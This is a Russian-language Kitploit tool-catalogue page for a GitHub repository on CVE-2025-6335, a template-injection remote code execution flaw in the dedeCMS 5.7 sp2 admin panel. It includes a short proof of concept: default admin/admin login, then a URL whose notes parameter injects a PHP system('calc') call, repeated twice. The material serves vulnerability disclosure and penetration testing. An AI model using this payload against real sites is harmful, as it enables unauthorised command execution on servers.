Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/jujubooom/cve-2025-6335
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubjujubooom/cve-2025-6335

CVE-2025-6335

отчёт CVE

Репозиторий
61 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Название: Уязвимость выполнения команд через шаблонную инъекцию в dedeCMS 5.7 sp2

BUG_Author: Ewoji

Затронутая версия: dedeCMS < 5.7.2

Вендор: Shanghai Zhuozhuo Network Technology Co., LTD

ПО: dedeCMS

Уязвимые файлы:

  • /include/dedetag.class.php

Описание:

  1. После установки войдите в панель администратора

    • Используйте учётные данные по умолчанию admin/admin
  2. Эксплуатация шаблона

    • Откройте интерфейс dede/co_get_corule.php
    • Передайте параметр /dede/co_get_corule.php? notes={dede:"); system('calc'); ///}&job=1. Если обратиться к нему дважды, можно выполнить команду
  3. Проверка эксплуатации:

    • Если инъекция прошла успешно, злоумышленник сможет выполнять произвольные команды

Подтверждение концепции:

root@kitploit:~
/dede/co_get_corule.php?notes={dede:\");system('calc');///}&job=1
Accessing twice like this can execute the command

подробнее:CVE-2025-6335 RCE через инъекцию в шаблон панели администратора dedeCMS

Скачать инструмент